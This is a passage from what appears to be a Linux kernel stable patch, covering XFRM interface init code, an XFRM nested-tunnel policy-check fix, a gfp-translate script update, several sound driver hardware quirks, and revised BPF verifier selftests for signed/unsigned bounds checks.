++	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
++xfrm_proto_ah_failed:
++	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
++xfrm_proto_esp_failed:
++	return err;
++}
++
++static void xfrmi4_fini(void)
++{
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++	xfrm4_tunnel_deregister(&xfrmi_ipip6_handler, AF_INET6);
++	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
++#endif
++	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
++	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
++	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
++}
++
++static int __init xfrmi6_init(void)
++{
++	int err;
++
++	err = xfrm6_protocol_register(&xfrmi_esp6_protocol, IPPROTO_ESP);
++	if (err < 0)
++		goto xfrm_proto_esp_failed;
++	err = xfrm6_protocol_register(&xfrmi_ah6_protocol, IPPROTO_AH);
++	if (err < 0)
++		goto xfrm_proto_ah_failed;
++	err = xfrm6_protocol_register(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
++	if (err < 0)
++		goto xfrm_proto_comp_failed;
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++	err = xfrm6_tunnel_register(&xfrmi_ipv6_handler, AF_INET6);
++	if (err < 0)
++		goto xfrm_tunnel_ipv6_failed;
++	err = xfrm6_tunnel_register(&xfrmi_ip6ip_handler, AF_INET);
++	if (err < 0)
++		goto xfrm_tunnel_ip6ip_failed;
++#endif
++
++	return 0;
++
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++xfrm_tunnel_ip6ip_failed:
++	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
++xfrm_tunnel_ipv6_failed:
++	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
++#endif
++xfrm_proto_comp_failed:
++	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
++xfrm_proto_ah_failed:
++	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
++xfrm_proto_esp_failed:
++	return err;
++}
++
++static void xfrmi6_fini(void)
++{
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++	xfrm6_tunnel_deregister(&xfrmi_ip6ip_handler, AF_INET);
++	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
++#endif
++	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
++	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
++	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
++}
++
++static const struct xfrm_if_cb xfrm_if_cb = {
++	.decode_session =	xfrmi_decode_session,
++};
++
++static int __init xfrmi_init(void)
++{
++	const char *msg;
++	int err;
++
++	pr_info("IPsec XFRM device driver\n");
++
++	msg = "tunnel device";
++	err = register_pernet_device(&xfrmi_net_ops);
++	if (err < 0)
++		goto pernet_dev_failed;
++
++	msg = "xfrm4 protocols";
++	err = xfrmi4_init();
++	if (err < 0)
++		goto xfrmi4_failed;
++
++	msg = "xfrm6 protocols";
++	err = xfrmi6_init();
++	if (err < 0)
++		goto xfrmi6_failed;
++
++
++	msg = "netlink interface";
++	err = rtnl_link_register(&xfrmi_link_ops);
++	if (err < 0)
++		goto rtnl_link_failed;
++
++	lwtunnel_encap_add_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
++
++	xfrm_if_register_cb(&xfrm_if_cb);
++
++	return err;
++
++rtnl_link_failed:
++	xfrmi6_fini();
++xfrmi6_failed:
++	xfrmi4_fini();
++xfrmi4_failed:
++	unregister_pernet_device(&xfrmi_net_ops);
++pernet_dev_failed:
++	pr_err("xfrmi init: failed to register %s\n", msg);
++	return err;
++}
++
++static void __exit xfrmi_fini(void)
++{
++	xfrm_if_unregister_cb();
++	lwtunnel_encap_del_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
++	rtnl_link_unregister(&xfrmi_link_ops);
++	xfrmi4_fini();
++	xfrmi6_fini();
++	unregister_pernet_device(&xfrmi_net_ops);
++}
++
++module_init(xfrmi_init);
++module_exit(xfrmi_fini);
++MODULE_LICENSE("GPL");
++MODULE_ALIAS_RTNL_LINK("xfrm");
++MODULE_ALIAS_NETDEV("xfrm0");
++MODULE_AUTHOR("Steffen Klassert");
++MODULE_DESCRIPTION("XFRM virtual interface");
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e894c269affb1..7b1b93584bdbe 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3274,6 +3274,13 @@ xfrm_policy_ok(const struct xfrm_tmpl *tmpl, const struct sec_path *sp, int star
+ 		if (xfrm_state_ok(tmpl, sp->xvec[idx], family, if_id))
+ 			return ++idx;
+ 		if (sp->xvec[idx]->props.mode != XFRM_MODE_TRANSPORT) {
++			if (idx < sp->verified_cnt) {
++				/* Secpath entry previously verified, consider optional and
++				 * continue searching
++				 */
++				continue;
++			}
++
+ 			if (start == -1)
+ 				start = -2-idx;
+ 			break;
+@@ -3648,6 +3655,9 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		 * Order is _important_. Later we will implement
+ 		 * some barriers, but at the moment barriers
+ 		 * are implied between each two transformations.
++		 * Upon success, marks secpath entries as having been
++		 * verified to allow them to be skipped in future policy
++		 * checks (e.g. nested tunnels).
+ 		 */
+ 		for (i = xfrm_nr-1, k = 0; i >= 0; i--) {
+ 			k = xfrm_policy_ok(tpp[i], sp, k, family, if_id);
+@@ -3666,6 +3676,8 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		}
+ 
+ 		xfrm_pols_put(pols, npols);
++		sp->verified_cnt = k;
++
+ 		return 1;
+ 	}
+ 	XFRM_INC_STATS(net, LINUX_MIB_XFRMINPOLBLOCK);
+diff --git a/scripts/gfp-translate b/scripts/gfp-translate
+index b2ce416d944b3..6c9aed17cf563 100755
+--- a/scripts/gfp-translate
++++ b/scripts/gfp-translate
+@@ -63,11 +63,11 @@ fi
+ 
+ # Extract GFP flags from the kernel source
+ TMPFILE=`mktemp -t gfptranslate-XXXXXX` || exit 1
+-grep -q ___GFP $SOURCE/include/linux/gfp.h
++grep -q ___GFP $SOURCE/include/linux/gfp_types.h
+ if [ $? -eq 0 ]; then
+-	grep "^#define ___GFP" $SOURCE/include/linux/gfp.h | sed -e 's/u$//' | grep -v GFP_BITS > $TMPFILE
++	grep "^#define ___GFP" $SOURCE/include/linux/gfp_types.h | sed -e 's/u$//' | grep -v GFP_BITS > $TMPFILE
+ else
+-	grep "^#define __GFP" $SOURCE/include/linux/gfp.h | sed -e 's/(__force gfp_t)//' | sed -e 's/u)/)/' | grep -v GFP_BITS | sed -e 's/)\//) \//' > $TMPFILE
++	grep "^#define __GFP" $SOURCE/include/linux/gfp_types.h | sed -e 's/(__force gfp_t)//' | sed -e 's/u)/)/' | grep -v GFP_BITS | sed -e 's/)\//) \//' > $TMPFILE
+ fi
+ 
+ # Parse the flags
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 920e44ba998a5..eb049014f87ac 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9594,6 +9594,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1254, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
++	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC225_FIXUP_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_HEADSET_MODE),
+ 	SND_PCI_QUIRK(0x144d, 0xc109, "Samsung Ativ book 9 (NP900X3G)", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc169, "Samsung Notebook 9 Pen (NP930SBE-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+@@ -9814,6 +9815,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
++	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC225_FIXUP_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 84b401b685f7f..c1ca3ceac5f2f 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -171,6 +171,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21CL"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21EF"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/nau8824.c b/sound/soc/codecs/nau8824.c
+index 4f19fd9b65d11..5a4db8944d06a 100644
+--- a/sound/soc/codecs/nau8824.c
++++ b/sound/soc/codecs/nau8824.c
+@@ -1903,6 +1903,30 @@ static const struct dmi_system_id nau8824_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)(NAU8824_MONO_SPEAKER),
+ 	},
++	{
++		/* Positivo CW14Q01P */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "CW14Q01P"),
++		},
++		.driver_data = (void *)(NAU8824_JD_ACTIVE_HIGH),
++	},
++	{
++		/* Positivo K1424G */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "K1424G"),
++		},
++		.driver_data = (void *)(NAU8824_JD_ACTIVE_HIGH),
++	},
++	{
++		/* Positivo N14ZP74G */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "N14ZP74G"),
++		},
++		.driver_data = (void *)(NAU8824_JD_ACTIVE_HIGH),
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 402286dfaea44..9c10200ff34b2 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -1190,7 +1190,6 @@ static const struct regmap_config wcd938x_regmap_config = {
+ 	.readable_reg = wcd938x_readable_register,
+ 	.writeable_reg = wcd938x_writeable_register,
+ 	.volatile_reg = wcd938x_volatile_register,
+-	.can_multi_write = true,
+ };
+ 
+ static const struct sdw_slave_ops wcd9380_slave_ops = {
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 6d88af5b287fe..b33104715c7ba 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -491,14 +491,21 @@ static int fsl_sai_set_bclk(struct snd_soc_dai *dai, bool tx, u32 freq)
+ 	regmap_update_bits(sai->regmap, reg, FSL_SAI_CR2_MSEL_MASK,
+ 			   FSL_SAI_CR2_MSEL(sai->mclk_id[tx]));
+ 
+-	if (savediv == 1)
++	if (savediv == 1) {
+ 		regmap_update_bits(sai->regmap, reg,
+ 				   FSL_SAI_CR2_DIV_MASK | FSL_SAI_CR2_BYP,
+ 				   FSL_SAI_CR2_BYP);
+-	else
++		if (fsl_sai_dir_is_synced(sai, adir))
++			regmap_update_bits(sai->regmap, FSL_SAI_xCR2(tx, ofs),
++					   FSL_SAI_CR2_BCI, FSL_SAI_CR2_BCI);
++		else
++			regmap_update_bits(sai->regmap, FSL_SAI_xCR2(tx, ofs),
++					   FSL_SAI_CR2_BCI, 0);
++	} else {
+ 		regmap_update_bits(sai->regmap, reg,
+ 				   FSL_SAI_CR2_DIV_MASK | FSL_SAI_CR2_BYP,
+ 				   savediv / 2 - 1);
++	}
+ 
+ 	if (sai->soc_data->max_register >= FSL_SAI_MCTL) {
+ 		/* SAI is in master mode at this point, so enable MCLK */
+diff --git a/sound/soc/fsl/fsl_sai.h b/sound/soc/fsl/fsl_sai.h
+index 697f6690068c8..c5423f81e4560 100644
+--- a/sound/soc/fsl/fsl_sai.h
++++ b/sound/soc/fsl/fsl_sai.h
+@@ -116,6 +116,7 @@
+ 
+ /* SAI Transmit and Receive Configuration 2 Register */
+ #define FSL_SAI_CR2_SYNC	BIT(30)
++#define FSL_SAI_CR2_BCI		BIT(28)
+ #define FSL_SAI_CR2_MSEL_MASK	(0x3 << 26)
+ #define FSL_SAI_CR2_MSEL_BUS	0
+ #define FSL_SAI_CR2_MSEL_MCLK1	BIT(26)
+diff --git a/sound/soc/generic/simple-card.c b/sound/soc/generic/simple-card.c
+index feb55b66239b8..fbb682747f598 100644
+--- a/sound/soc/generic/simple-card.c
++++ b/sound/soc/generic/simple-card.c
+@@ -416,6 +416,7 @@ static int __simple_for_each_link(struct asoc_simple_priv *priv,
+ 
+ 			if (ret < 0) {
+ 				of_node_put(codec);
++				of_node_put(plat);
+ 				of_node_put(np);
+ 				goto error;
+ 			}
+diff --git a/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c b/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c
+index c2aa6f26738b4..bf82b923c5fe5 100644
+--- a/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c
++++ b/tools/testing/selftests/bpf/verifier/bounds_mix_sign_unsign.c
+@@ -1,13 +1,14 @@
+ {
+ 	"bounds checks mixing signed and unsigned, positive bounds",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 2),
+ 	BPF_JMP_REG(BPF_JGE, BPF_REG_2, BPF_REG_1, 3),
+@@ -17,20 +18,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 3),
+@@ -40,20 +42,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 2",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 5),
+@@ -65,20 +68,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 3",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 4),
+@@ -89,20 +93,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 4",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 1),
+ 	BPF_ALU64_REG(BPF_AND, BPF_REG_1, BPF_REG_2),
+@@ -112,19 +117,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.result = ACCEPT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 5",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 5),
+@@ -135,17 +141,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 6",
+ 	.insns = {
++	BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
++	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
+ 	BPF_MOV64_IMM(BPF_REG_2, 0),
+ 	BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -512),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_6, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_4, BPF_REG_6, 5),
+@@ -163,13 +172,14 @@
+ {
+ 	"bounds checks mixing signed and unsigned, variant 7",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 7),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 6),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 1024 * 1024 * 1024),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_1, BPF_REG_2, 3),
+@@ -179,19 +189,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.result = ACCEPT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 8",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, -1),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_2, BPF_REG_1, 2),
+@@ -203,20 +214,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 9",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 10),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_LD_IMM64(BPF_REG_2, -9223372036854775808ULL),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_2, BPF_REG_1, 2),
+@@ -228,19 +240,20 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.result = ACCEPT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 10",
+ 	.insns = {
++	BPF_EMIT_CALL(BPF_FUNC_ktime_get_ns),
++	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+-	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 9),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, -8),
++	BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 8),
+ 	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
+ 	BPF_MOV64_IMM(BPF_REG_2, 0),
+ 	BPF_JMP_REG(BPF_JGT, BPF_REG_2, BPF_REG_1, 2),
+@@ -252,20 +265,21 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_8b = { 3 },
++	.fixup_map_hash_8b = { 5 },
+ 	.errstr = "unbounded min value",
+ 	.result = REJECT,
+ },
+ {
+ 	"bounds checks mixing signed and unsigned, variant 11",
+ 	.insns = {
